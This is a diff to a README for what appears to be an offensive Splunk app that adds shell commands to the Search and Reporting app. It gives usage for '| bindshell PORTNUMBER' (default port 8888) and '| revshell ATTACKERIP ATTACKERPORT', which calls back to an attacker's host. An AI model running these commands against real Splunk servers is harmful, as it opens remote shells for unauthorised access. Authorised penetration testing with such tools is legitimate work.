TBGSecurity/splunk_shells/README.md

 # Usage
 using each of these shells can be done from the Search and Reporting app.
 Execute the following searches:

-'| bindshell <port number>' The port number can be specified or left off if left off the default is 8888
+'| bindshell PORTNUMBER' The port number can be specified or left off if left off the default is 8888

-'| revshell <attack ip> <attack port>' The Attacker IP and Port need to be specified for the shell to call back.
+'| revshell ATTACKERIP ATTACKERPORT' The Attacker IP and Port need to be specified for the shell to call back.